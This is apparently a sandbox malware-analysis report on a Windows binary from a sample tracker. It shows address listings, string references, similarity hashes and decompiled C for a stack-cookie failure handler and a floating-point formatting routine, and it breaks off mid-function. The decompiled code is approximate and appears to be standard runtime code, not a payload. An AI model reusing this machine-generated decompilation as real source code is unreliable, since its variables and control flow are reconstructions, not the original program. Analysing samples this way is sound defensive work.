0x0040708f
0x0040709b
0x004070a7
0x004070b3
0x004070bf
0x004070cb
0x004070d7
0x004070e3
0x004070ef
0x004070fb
0x00407107
0x00407113
0x0040711f
0x0040712b
0x00407137
0x00407143
0x0040714f
0x0040715b
0x00407167
0x00407173
0x0040717f
0x0040718b
0x00407197
0x004071a3
0x004071af
0x004071bb
0x004071c7
0x004071d3
0x004071df
0x004071eb
0x004071f7
0x00407203
0x0040720f
0x0040721b
0x00407227
0x00407233
0x0040723f
0x0040724b
0x00407257
0x00407263
0x0040726f
0x0040727b
0x00407287
0x00407293
0x0040729f
0x004072ab
0x004072b7
0x004072c3
0x004072cf
0x004072db
0x004072e7
0x004072f3
0x004072ff
0x0040730b
0x00407317
0x00407323
0x0040732f
0x0040733b
0x00407347
0x00407353
0x0040735f
0x0040736b
0x00407377
0x00407383
0x00407389
0x0040738f
0x00407395
0x00407397
0x004073a3
0x004073af
0x004073bb
0x004073c7
0x004073d3
0x004073df
0x004073eb
0x004073f7
0x00407403
0x0040740f
0x0040741b
0x00407427
0x00407433
0x0040743f
0x0040744b
0x00407457
0x00407463
0x0040746f
0x0040747b
0x00407487
0x00407493
0x0040749f
0x004074ab
0x004074b7
0x004074c3
0x004074cf
0x004074db
0x004074e7
0x004074f3
0x004074ff
0x0040750b
0x00407517
0x00407523
0x0040752f
0x0040753b
0x00407547
0x00407553
0x0040755f
0x0040756b
0x00407577
0x00407583
0x0040758f
0x0040759b
0x004075a7
0x004075b3
0x004075bf
0x004075cb
0x004075d7
0x004075e3
0x004075ef
0x004075fb
0x00407607
0x00407613
0x0040761f
0x0040762b
0x00407637
0x00407643
0x0040764f
0x0040765b
0x00407667
0x00407673
0x0040767f
0x0040768b
0x00407697
0x0040769d
0x004076a3
0x004076a9
0x004076ab
0x004076b7
0x004076c3
0x004076cf
0x004076db
0x004076e7
0x004076f3
0x004076ff
0x0040770b
0x00407717
0x00407723
0x0040772f
0x0040773b
0x00407747
0x00407753
0x0040775f
0x0040776b
0x00407777
0x00407783
0x0040778f
0x0040779b
0x004077a7
0x004077b3
0x004077bf
0x004077cb
0x004077d7
0x004077e3
0x004077ef
0x004077fb
0x00407807
0x00407813
0x0040781f
0x0040782b
0x00407837
0x00407843
0x0040784f
0x0040785b
0x00407861
0x00407867
0x0040786d
0x0040786f
0x0040787b
0x00407887
0x00407893
0x0040789f
0x004078ab
0x004078b7
0x004078c3
0x004078cf
0x004078db
0x004078e7
0x004078f3
0x004078ff
0x0040790b
0x00407917
0x00407923
0x0040792f
0x0040793b
0x00407947
0x00407953
0x0040795f
0x0040796b
0x00407977
0x00407983
0x0040798f
0x0040799b
0x004079a7
0x004079b3
0x004079bf
0x004079cb
0x004079d7
0x004079e3
0x004079ef
0x004079fb
0x00407a07
0x00407a13
0x00407a1f
0x00407a2b
0x00407a37
0x00407a43
0x00407a4f
0x00407a5b
0x00407a67
0x00407a73
0x00407a7f
0x00407a8b
0x00407a97
0x00407aa3
0x00407aaf
0x00407abb
0x00407ac7
0x00407ad3
0x00407adf
0x00407aeb
0x00407af7
0x00407b03
0x00407b0f
0x00407b1b
0x00407b21
0x00407b27
0x00407b2d
0x00407b2f
0x00407b3b
0x00407b47
0x00407b53
0x00407b5f
0x00407b6b
0x00407b77
0x00407b83
0x00407b8f
0x00407b9b
0x00407ba7
0x00407bb3
0x00407bbf
0x00407bcb
0x00407bd7
0x00407be3
0x00407bef
0x00407bfb
0x00407c07
0x00407c13
0x00407c1f
0x00407c2b
0x00407c37
0x00407c43
0x00407c4f
0x00407c5b
0x00407c67
0x00407c73
0x00407c7f
0x00407c8b
0x00407c97
0x00407ca3
0x00407caf
0x00407cbb
0x00407cc7
0x00407cd3
0x00407cdf
0x00407ceb
0x00407cf7
0x00407d03
0x00407d0f
0x00407d1b
0x00407d27
0x00407d33
0x00407d3f
0x00407d4b
0x00407d57
0x00407d63
0x00407d6f
0x00407d7b
0x00407d87
0x00407d93
0x00407d9f
0x00407dab
0x00407db7
0x00407dc3
0x00407dcf
0x00407ddb
0x00407de7
0x00407df3
0x00407dff
0x00407e0b
0x00407e17
0x00407e23
0x00407e2f
0x00407e3b
0x00407e47
0x00407e53
0x00407e5f
0x00407e6b
0x00407e77
0x00407e83
0x00407e8f
0x00407e9b
0x00407ea7
0x00407eb3
0x00407ebf
0x00407ecb
0x00407ed7
0x00407ee3
0x00407eef
0x00407efb
0x00407f07
0x00407f13
0x00407f1f
0x00407f2b
0x00407f37
0x00407f43
0x00407f4f
0x00407f5b
0x00407f67
0x00407f73
0x00407f7f
0x00407f8b
0x00407f97
0x00407fa3
0x00407faf
0x00407fbb
0x00407fc7
0x00407fd3
0x00407fdf
0x00407feb
0x00407ff7
0x00408003
0x0040800f
0x0040801b
0x00408027
0x00408033
0x0040803f
0x0040804b
0x00408057
0x00408063
0x0040806f
0x0040807b
0x00408087
0x00408093
0x0040809f
0x004080ab
0x004080b7
0x004080c3
0x004080cf
0x004080db
0x004080e7
0x004080f3
0x004080ff
0x0040810b
0x00408117
0x00408123
0x0040812f
0x0040813b
0x00408147
0x00408153
0x0040815f
0x0040816b
0x00408177
0x00408183
0x0040818f
0x0040819b
0x004081a7
0x004081b3
0x004081bf
0x004081cb
0x004081d7
0x004081e3
0x004081ef
0x004081fb
0x00408207
0x00408213
0x0040821f
0x0040822b
0x00408237
0x00408243
0x0040824f
0x0040825b
0x00408267
0x00408273
0x0040827f
0x0040828b
0x00408297
0x004082a3
0x004082af
0x004082bb
0x004082c7
0x004082d3
0x004082df
0x004082eb
0x004082f7
0x00408303
0x0040830f
0x0040831b
0x00408327
0x00408333
0x0040833f
0x0040834b
0x00408357
0x00408363
0x0040836f
0x0040837b
0x00408387
0x00408393
0x0040839f
0x004083ab
0x004083b7
0x004083c3
0x004083cf
0x004083db
0x004083e7
0x004083f3
0x004083ff
0x0040840b
0x00408417
0x00408423
0x0040842f
0x0040843b
0x00408447
0x00408453
0x0040845f
0x0040846b
0x00408477
0x00408483
0x0040848f
0x0040849b
0x004084a7
0x004084b3
0x004084bf
0x004084cb
0x004084d7
0x004084e3
0x004084ef
0x004084fb
0x00408507
0x00408513
0x0040851f
0x00408534
0x0040853f
0x00408541
0x00408553
0x00408566
0x0040856c
0x00408578
0x00408589
0x0040858f
0x004085a7
0x004085af
0x004085bd
0x004085c9
0x004085d4
0x004085d4
0x004085e4
0x004085f0
0x004085ff
0x0040861a
0x00408627
0x00408636
0x0040863c
0x0040864e
0x0040865a
0x00408663
0x00408682
0x0040868a
0x00408690

Strings

5, xrefs: 00404D17
!, xrefs: 00404AA9
", xrefs: 00404A96
:, xrefs: 00405544
1, xrefs: 00404D5B
, xrefs: 00404AB2
!, xrefs: 00404E86

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID: $!$!$"$1$5$:
API String ID: 0-744832420
Opcode ID: d38e5a9a9c58b277ef392701666da75b3b01ee7bcd690fe9dc877ccd83e9f59d
Instruction ID: de6cfa0c6731dd31bf3af4478faae62b13f2d9d52110519dd7602d21abc02935
Opcode Fuzzy Hash: d38e5a9a9c58b277ef392701666da75b3b01ee7bcd690fe9dc877ccd83e9f59d
Instruction Fuzzy Hash: 8873583095996DC6EB60AF55FC886E8BF71FB88341F8281E4D0D861199CF311AF8CB59

Function 0040FE9A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57

C-Code - Quality: 85%

			E0040FE9A(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x42c4a0; // 0xe190ffa3
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x4367e8 = _t6;
				 *0x4367e4 = _t22;
				 *0x4367e0 = _t25;
				 *0x4367dc = _t21;
				 *0x4367d8 = _t27;
				 *0x4367d4 = _t26;
				 *0x436800 = ss;
				 *0x4367f4 = cs;
				 *0x4367d0 = ds;
				 *0x4367cc = es;
				 *0x4367c8 = fs;
				 *0x4367c4 = gs;
				asm("pushfd");
				_pop( *0x4367f8);
				 *0x4367ec =  *_t31;
				 *0x4367f0 = _v0;
				 *0x4367fc =  &_a4;
				 *0x436738 = 0x10001;
				_t11 =  *0x4367f0; // 0x0
				 *0x4366ec = _t11;
				 *0x4366e0 = 0xc0000409;
				 *0x4366e4 = 1;
				_t12 =  *0x42c4a0; // 0xe190ffa3
				_v812 = _t12;
				_t13 =  *0x42c4a4; // 0x1e6f005c
				_v808 = _t13;
				 *0x436730 = IsDebuggerPresent();
				_push(1);
				E0040FE17(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("?fC");
				if( *0x436730 == 0) {
					_push(1);
					E0040FE17(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040fe9a
0x0040fe9a
0x0040fe9a
0x0040fe9a
0x0040fe9a
0x0040fe9a
0x0040fe9a
0x0040fea0
0x0040fea2
0x0040fea2
0x00412a58
0x00412a5d
0x00412a63
0x00412a69
0x00412a6f
0x00412a75
0x00412a7b
0x00412a82
0x00412a89
0x00412a90
0x00412a97
0x00412a9e
0x00412aa5
0x00412aa6
0x00412aaf
0x00412ab7
0x00412abf
0x00412aca
0x00412ad4
0x00412ad9
0x00412ade
0x00412ae8
0x00412af2
0x00412af7
0x00412afd
0x00412b02
0x00412b0e
0x00412b13
0x00412b15
0x00412b1d
0x00412b28
0x00412b35
0x00412b37
0x00412b39
0x00412b3e
0x00412b52

APIs

IsDebuggerPresent.KERNEL32 ref: 00412B08
SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Strings

fC, xrefs: 00412B23

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: fC
API String ID: 2579439406-201631668
Opcode ID: cb2e7dbc0ba11512d45034d35daa4d311946faf94d4044318c7593f26828c381
Instruction ID: 311a2433788c888b2570000bb709f37abea71b1efbf1095dc2b51b401d63ab1f
Opcode Fuzzy Hash: cb2e7dbc0ba11512d45034d35daa4d311946faf94d4044318c7593f26828c381
Instruction Fuzzy Hash: A721D4B4500302AFC710DF19F985A897BB4FB08718F92A03AE409877B5E7B459858F5D

Function 004151B9, Relevance: 8.3, Strings: 6, Instructions: 758
Crypto

C-Code - Quality: 59%

			E004151B9(void* _a4, intOrPtr _a16, signed int _a20, signed int* _a24) {
				signed int _v8;
				short _v10;
				signed int _v12;
				signed int _v14;
				unsigned int _v16;
				signed int _v18;
				unsigned int _v20;
				char _v25;
				signed int _v26;
				signed int _v28;
				signed int _v30;
				signed short _v32;
				signed short _v34;
				signed int _v36;
				char _v41;
				signed int _v42;
				char _v43;
				signed int _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v62;
				char _v64;
				signed short _v68;
				signed short _v72;
				signed short _v76;
				signed short _v80;
				signed short _v84;
				signed short* _v88;
				signed short _v92;
				signed int* _v96;
				signed int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				signed int _v112;
				signed short _v116;
				signed short _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t367;
				signed int _t376;
				signed short _t383;
				signed short* _t385;
				signed short _t386;
				unsigned int _t389;
				signed short _t392;
				signed int _t393;
				intOrPtr _t394;
				signed short* _t406;
				signed short _t408;
				signed short _t414;
				signed int _t417;
				char* _t418;
				signed short _t419;
				signed short _t424;
				signed short _t427;
				signed int* _t433;
				signed short _t437;
				signed short _t439;
				signed short _t440;
				intOrPtr* _t441;
				signed int _t449;
				signed short _t452;
				signed short _t456;
				signed short _t457;
				intOrPtr _t458;
				signed short _t464;
				unsigned int _t466;
				signed short _t468;
				unsigned int _t471;
				signed short _t479;
				signed short _t482;
				signed short _t485;
				signed int _t487;
				short* _t489;
				signed int _t492;
				signed int _t498;
				signed int _t499;
				char _t508;
				signed short _t509;
				unsigned int _t511;
				signed int _t512;
				signed int _t513;
				void* _t515;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				void* _t535;
				signed int _t543;
				signed short _t556;
				signed int _t559;
				intOrPtr* _t560;
				signed short _t571;
				signed int _t572;
				signed short _t574;
				signed int _t576;
				signed int _t589;
				signed int _t594;
				signed int _t605;

				_t367 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t367 ^ _t605;
				_t433 = _a24;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t498 = _v12;
				_t449 = _t498 & 0x00008000;
				_t499 = _t498 & 0x00007fff;
				_v100 = _t433;
				_v52 = 0xcc;
				_v51 = 0xcc;
				_v50 = 0xcc;
				_v49 = 0xcc;
				_v48 = 0xcc;
				_v47 = 0xcc;
				_v46 = 0xcc;
				_v45 = 0xcc;
				_v44 = 0xcc;
				_v43 = 0xcc;
				_v42 = 0xfb;
				_v41 = 0x3f;
				_v120 = 1;
				_v112 = _t449;
				if(_t449 == 0) {
					_t433[0] = 0x20;
				} else {
					_t433[0] = 0x2d;
				}
				_t582 = _v16;
				_t562 = _v20;
				if(_t499 != 0 || _t582 != 0 || _t562 != 0) {
					__eflags = _t499 - 0x7fff;
					if(_t499 != 0x7fff) {
						_t452 = (((_t499 & 0x0000ffff) >> 0x00000008) + (_t582 >> 0x00000018) * 0x00000002) * 0x0000004d + (_t499 & 0x0000ffff) * 0x00004d10 - 0x134312f4 >> 0x00000010 & 0x0000ffff;
						_v80 = _t452;
						_t376 = 0;
						_t437 =  ~_t452;
						__eflags = _t437;
						_v26 = _t499;
						_v30 = _t582;
						_v34 = _t562;
						_v36 = 0;
						_v108 = 0x42ccd0;
						if(__eflags == 0) {
							L85:
							_t456 = _v28 >> 0x10;
							__eflags = _t456 - 0x3fff;
							if(_t456 < 0x3fff) {
								L136:
								__eflags = _a20 & 0x00000001;
								_t499 = _v100;
								_t457 = _v80;
								 *_t499 = _t457;
								if((_a20 & 0x00000001) == 0) {
									L139:
									_t458 = 0x15;
									__eflags = _a16 - _t458;
									if(_a16 > _t458) {
										_a16 = _t458;
									}
									_t582 = (_v28 >> 0x10) - 0x3ffe;
									__eflags = _t582;
									_v26 = _t376;
									_t439 = 8;
									do {
										_v36 = _v36 << 1;
										_t562 = _v32 + _v32 | _v36 >> 0x0000001f;
										_t439 = _t439 - 1;
										__eflags = _t439;
										_v32 = _v32 + _v32 | _v36 >> 0x0000001f;
										_v28 = _v28 + _v28 | _v32 >> 0x0000001f;
									} while (_t439 != 0);
									__eflags = _t582;
									if(_t582 >= 0) {
										L146:
										_t383 = _a16 + 1;
										__eflags = _t383;
										_t440 = _t499 + 4;
										_v68 = _t440;
										_v80 = _t383;
										if(_t383 <= 0) {
											L158:
											_t441 = _t440 - 1;
											_t442 = _t441 - 1;
											__eflags =  *_t441 - 0x35;
											if( *_t441 >= 0x35) {
												while(1) {
													__eflags = _t442 - _v68;
													if(_t442 < _v68) {
														break;
													}
													__eflags =  *_t442 - 0x39;
													if( *_t442 != 0x39) {
														break;
													}
													 *_t442 = 0x30;
													_t442 = _t442 - 1;
													__eflags = _t442;
												}
												__eflags = _t442 - _v68;
												_t385 = _v100;
												if(_t442 < _v68) {
													_t442 = _t442 + 1;
													 *_t385 =  *_t385 + 1;
													__eflags =  *_t385;
												}
												 *_t442 =  *_t442 + 1;
												__eflags =  *_t442;
												L166:
												_t442 = _t442 - _t385 - 3;
												__eflags = _t442;
												_t385[1] = _t442;
												 *((char*)( &(_t385[2]) + _t442)) = 0;
												_t386 = _v120;
												goto L167;
											}
											_t464 = _v68;
											while(1) {
												__eflags = _t442 - _t464;
												if(_t442 < _t464) {
													break;
												}
												__eflags =  *_t442 - 0x30;
												if( *_t442 != 0x30) {
													break;
												}
												_t442 = _t442 - 1;
												__eflags = _t442;
											}
											__eflags = _t442 - _t464;
											_t385 = _v100;
											if(_t442 >= _t464) {
												goto L166;
											}
											 *_t385 =  *_t385 & 0x00000000;
											__eflags = _v112 - 0x8000;
											_t385[1] = 1;
											_t385[1] = _t499;
											 *_t464 = 0x30;
											_t385[2] = 0;
											goto L7;
										} else {
											goto L147;
										}
										do {
											L147:
											_t389 = _v32;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											_v36 = _v36 << 1;
											_v36 = _v36 << 1;
											_t466 = _t389 + _t389 | _v36 >> 0x0000001f;
											_t508 = _v64;
											_t468 = (_v28 + _v28 | _t389 >> 0x0000001f) + (_v28 + _v28 | _t389 >> 0x0000001f) | _t466 >> 0x0000001f;
											_t392 = _v36;
											_t589 = _t466 + _t466 | _v36 >> 0x0000001f;
											_t562 = _t508 + _t392;
											__eflags = _t562 - _t392;
											if(_t562 < _t392) {
												L149:
												_t393 = _t589 + 1;
												_t509 = 0;
												__eflags = _t393 - _t589;
												if(_t393 < _t589) {
													L151:
													_t509 = 1;
													__eflags = 1;
													L152:
													__eflags = _t509;
													_t589 = _t393;
													if(_t509 != 0) {
														_t468 = _t468 + 1;
														__eflags = _t468;
													}
													L154:
													_t394 = _v60;
													_t511 = _t394 + _t589;
													__eflags = _t511 - _t589;
													_v72 = _t511;
													if(_t511 < _t589) {
														L156:
														_t468 = _t468 + 1;
														__eflags = _t468;
														goto L157;
													}
													__eflags = _t511 - _t394;
													if(_t511 >= _t394) {
														goto L157;
													}
													goto L156;
												}
												__eflags = _t393 - 1;
												if(_t393 >= 1) {
													goto L152;
												}
												goto L151;
											}
											__eflags = _t562 - _t508;
											if(_t562 >= _t508) {
												goto L154;
											}
											goto L149;
											L157:
											_t499 = _t511 >> 0x1f;
											_t471 = _t468 + _v56 + _t468 + _v56 | _t499;
											_v36 = _t562 + _t562;
											_t591 = _v72;
											_v28 = _t471;
											_t582 = _v72 + _t591 | _t562 >> 0x0000001f;
											 *_t440 = (_t471 >> 0x18) + 0x30;
											_t440 = _t440 + 1;
											_v80 = _v80 - 1;
											__eflags = _v80;
											_v32 = _v72 + _t591 | _t562 >> 0x0000001f;
											_v25 = 0;
										} while (_v80 > 0);
										goto L158;
									}
									_t582 =  ~_t582 & 0x000000ff;
									__eflags = _t582;
									if(_t582 <= 0) {
										goto L146;
									} else {
										goto L145;
									}
									do {
										L145:
										_v28 = _v28 >> 1;
										_t562 = _v32 >> 0x00000001 | _v28 << 0x0000001f;
										_t582 = _t582 - 1;
										__eflags = _t582;
										_v32 = _v32 >> 0x00000001 | _v28 << 0x0000001f;
										_v36 = _v36 >> 0x00000001 | _v32 << 0x0000001f;
									} while (_t582 > 0);
									goto L146;
								}
								_a16 = _a16 + _t457;
								__eflags = _a16 - _t376;
								if(_a16 > _t376) {
									goto L139;
								}
								 *_t499 =  *_t499 & 0x00000000;
								__eflags = _v112 - 0x8000;
								 *((char*)(_t499 + 3)) = 1;
								 *((char*)(_t499 + 2)) = ((_t376 & 0xffffff00 | _v112 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
								 *(_t499 + 4) = 0x30;
								 *((char*)(_t499 + 5)) = 0;
								goto L7;
							}
							_t594 = _v42;
							_v80 = _v80 + 1;
							_t512 = _t456 & 0x0000ffff;
							_t513 = _t512 & 0x00007fff;
							_t582 = _t594 & 0x00007fff;
							_t479 = (_t594 ^ _t512) & 0x00008000;
							__eflags = _t513 - 0x7fff;
							_v92 = _t376;
							_v20 = _t376;
							_v16 = _t376;
							_v12 = _t376;
							_t562 = _t582 + _t513 & 0x0000ffff;
							if(_t513 >= 0x7fff) {
								L134:
								asm("sbb ecx, ecx");
								_t482 = ( ~_t479 & 0x80000000) + 0x7fff8000;
								__eflags = _t482;
								_v28 = _t482;
								L135:
								_v32 = _t376;
								_v36 = _t376;
								goto L136;
							}
							__eflags = _t582 - 0x7fff;
							if(_t582 >= 0x7fff) {
								goto L134;
							}
							__eflags = _t562 - 0xbffd;
							if(_t562 > 0xbffd) {
								goto L134;
							}
							__eflags = _t562 - 0x3fbf;
							if(_t562 > 0x3fbf) {
								__eflags = _t513 - _t376;
								if(_t513 != _t376) {
									L96:
									__eflags = _t582 - _t376;
									if(_t582 != _t376) {
										L100:
										_t195 =  &_v88;
										 *_t195 = _v88 & 0x00000000;
										__eflags =  *_t195;
										_t406 =  &_v16;
										_v68 = 5;
										do {
											_t582 = _v68;
											_t515 = _v88 + _v88;
											__eflags = _t582;
											_v84 = _t582;
											if(_t582 <= 0) {
												goto L109;
											}
											_v96 =  &_v44;
											_v76 = _t605 + _t515 - 0x20;
											do {
												_v72 = _v72 & 0x00000000;
												_t531 = ( *_v96 & 0x0000ffff) * ( *_v76 & 0x0000ffff);
												_t582 =  *(_t406 - 4);
												_t442 = _t582 + _t531;
												__eflags = _t442 - _t582;
												if(_t442 < _t582) {
													L105:
													_v72 = 1;
													goto L106;
												}
												__eflags = _t442 - _t531;
												if(_t442 >= _t531) {
													goto L106;
												}
												goto L105;
												L106:
												__eflags = _v72;
												 *(_t406 - 4) = _t442;
												if(_v72 != 0) {
													 *_t406 =  *_t406 + 1;
													__eflags =  *_t406;
												}
												_v76 = _v76 + 2;
												_v96 = _v96 - 2;
												_v84 = _v84 - 1;
												__eflags = _v84;
											} while (_v84 > 0);
											L109:
											_t406 =  &(_t406[1]);
											_v88 =  &(_v88[0]);
											_v68 = _v68 - 1;
											__eflags = _v68;
										} while (_v68 > 0);
										_t571 = _t562 + 0xc002;
										_t408 = 0;
										__eflags = _t571;
										if(_t571 <= 0) {
											L114:
											_t562 = _t571 + 0xffff;
											__eflags = _t562 - _t408;
											if(_t562 >= _t408) {
												L121:
												__eflags = _v20 - 0x8000;
												if(_v20 > 0x8000) {
													L123:
													__eflags = _v18 - 0xffffffff;
													if(_v18 != 0xffffffff) {
														_t267 =  &_v18;
														 *_t267 = _v18 + 1;
														__eflags =  *_t267;
													} else {
														__eflags = _v14 - 0xffffffff;
														_v18 = _t408;
														if(_v14 != 0xffffffff) {
															_v14 = _v14 + 1;
														} else {
															__eflags = _v10 - 0xffff;
															_v14 = _t408;
															if(_v10 != 0xffff) {
																_v10 = _v10 + 1;
															} else {
																_v10 = 0x8000;
																_t562 = _t562 + 1;
															}
														}
													}
													L130:
													__eflags = _t562 - 0x7fff;
													if(_t562 < 0x7fff) {
														_v36 = _v18;
														_v34 = _v16;
														_t562 = _t562 | _t479;
														_v30 = _v12;
														_v26 = _t562;
													} else {
														_v32 = _t408;
														_v36 = _t408;
														asm("sbb ecx, ecx");
														_t485 = ( ~_t479 & 0x80000000) + 0x7fff8000;
														__eflags = _t485;
														_v28 = _t485;
													}
													_t376 = 0;
													goto L136;
												}
												__eflags = (_v20 & 0x0001ffff) - 0x18000;
												if((_v20 & 0x0001ffff) != 0x18000) {
													goto L130;
												}
												goto L123;
											}
											_t414 =  ~_t562 & 0x0000ffff;
											_t562 = _t562 + _t414;
											__eflags = _t562;
											do {
												__eflags = _v20 & 0x00000001;
												if((_v20 & 0x00000001) != 0) {
													_t242 =  &_v92;
													 *_t242 = _v92 + 1;
													__eflags =  *_t242;
												}
												_v12 = _v12 >> 1;
												_t442 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
												_t582 = _v16 << 0x1f;
												_t414 = _t414 - 1;
												__eflags = _t414;
												_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
												_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
											} while (_t414 != 0);
											_t408 = 0;
											__eflags = _v92;
											if(_v92 != 0) {
												_t253 =  &_v20;
												 *_t253 = _v20 | 0x00000001;
												__eflags =  *_t253;
											}
											goto L121;
										} else {
											goto L111;
										}
										while(1) {
											L111:
											__eflags = _v12 & 0x80000000;
											if((_v12 & 0x80000000) != 0) {
												break;
											}
											_t446 = _v16;
											_v20 = _v20 << 1;
											_t442 = _v16 + _t446 | _v20 >> 0x0000001f;
											_t582 = _v16 >> 0x1f;
											_t571 = _t571 + 0xffff;
											__eflags = _t571 - _t408;
											_v16 = _v16 + _t446 | _v20 >> 0x0000001f;
											_v12 = _v12 + _v12 | _v16 >> 0x0000001f;
											if(_t571 > _t408) {
												continue;
											}
											break;
										}
										__eflags = _t571 - _t408;
										if(_t571 > _t408) {
											goto L121;
										}
										goto L114;
									}
									_t562 = _t562 + 1;
									__eflags = _v44 & 0x7fffffff;
									if((_v44 & 0x7fffffff) != 0) {
										goto L100;
									}
									__eflags = _v48 - _t376;
									if(_v48 != _t376) {
										goto L100;
									}
									__eflags = _v52 - _t376;
									if(_v52 == _t376) {
										goto L90;
									}
									goto L100;
								}
								_t562 = _t562 + 1;
								__eflags = _v28 & 0x7fffffff;
								if((_v28 & 0x7fffffff) != 0) {
									goto L96;
								}
								__eflags = _v32 - _t376;
								if(_v32 != _t376) {
									goto L96;
								}
								__eflags = _v36 - _t376;
								if(_v36 != _t376) {
									goto L96;
								}
								_v26 = _t376;
								goto L136;
							}
							L90:
							_v28 = _t376;
							goto L135;
						}
						if(__eflags < 0) {
							_t437 =  ~_t437;
							__eflags = 0x42ce90;
							_v108 = 0x42ce30;
						}
						__eflags = _t437 - _t376;
						if(_t437 != _t376) {
							do {
								_v108 = _v108 + 0x54;
								_t487 = _t437 & 0x00000007;
								_t437 = _t437 >> 3;
								__eflags = _t487;
								if(_t487 == 0) {
									goto L83;
								}
								_t489 = _t487 * 0xc + _v108;
								__eflags =  *_t489 - 0x8000;
								_v104 = _t489;
								if( *_t489 >= 0x8000) {
									asm("movsd");
									asm("movsd");
									_t418 =  &_v64;
									asm("movsd");
									_t54 =  &_v62;
									 *_t54 = _v62 - 1;
									__eflags =  *_t54;
									_v104 = _t418;
									_t489 = _t418;
								}
								_t572 =  *(_t489 + 0xa) & 0x0000ffff;
								_t532 = _v26;
								_t582 = 0x7fff;
								_t533 = _t532 & 0x00007fff;
								_t562 = _t572 & 0x00007fff;
								_v76 = 0;
								_v20 = 0;
								_v16 = 0;
								_v12 = 0;
								_t492 = (_t572 ^ _t532) & 0x00008000;
								__eflags = _t533 - 0x7fff;
								_t417 = _t562 + _t533 & 0x0000ffff;
								if(_t533 >= 0x7fff) {
									L82:
									asm("sbb ecx, ecx");
									_v32 = _v32 & 0x00000000;
									_t171 =  &_v36;
									 *_t171 = _v36 & 0x00000000;
									__eflags =  *_t171;
									_v28 = ( ~_t492 & 0x80000000) + 0x7fff8000;
								} else {
									__eflags = _t562 - 0x7fff;
									if(_t562 >= 0x7fff) {
										goto L82;
									}
									__eflags = _t417 - 0xbffd;
									if(_t417 > 0xbffd) {
										goto L82;
									}
									__eflags = _t417 - 0x3fbf;
									if(_t417 > 0x3fbf) {
										_t582 = 0;
										__eflags = _t533;
										if(_t533 != 0) {
											L45:
											__eflags = _t562 - _t582;
											if(_t562 != _t582) {
												L50:
												_t574 =  &_v16;
												_v96 = _t582;
												_v72 = _t574;
												_v68 = 5;
												do {
													_t582 = _v68;
													_t535 = _v96 + _v96;
													__eflags = _t582;
													_v84 = _t582;
													if(_t582 <= 0) {
														goto L59;
													}
													_v92 = _t605 + _t535 - 0x20;
													_t556 = _v104 + 8;
													__eflags = _t556;
													_v88 = _t556;
													do {
														_t576 =  *(_t574 - 4);
														_t559 = ( *_v92 & 0x0000ffff) * ( *_v88 & 0x0000ffff);
														_v116 = _v116 & 0x00000000;
														_t582 = _t576 + _t559;
														__eflags = _t582 - _t576;
														if(_t582 < _t576) {
															L55:
															_v116 = 1;
															goto L56;
														}
														__eflags = _t582 - _t559;
														if(_t582 >= _t559) {
															goto L56;
														}
														goto L55;
														L56:
														__eflags = _v116;
														_t574 = _v72;
														 *(_t574 - 4) = _t582;
														if(_v116 != 0) {
															 *_t574 =  *_t574 + 1;
															__eflags =  *_t574;
														}
														_v92 = _v92 + 2;
														_v88 = _v88 - 2;
														_v84 = _v84 - 1;
														__eflags = _v84;
													} while (_v84 > 0);
													L59:
													_t574 = _t574 + 2;
													_v96 = _v96 + 1;
													_v68 = _v68 - 1;
													__eflags = _v68;
													_v72 = _t574;
												} while (_v68 > 0);
												_t419 = _t417 + 0xc002;
												__eflags = _t419;
												if(_t419 <= 0) {
													L64:
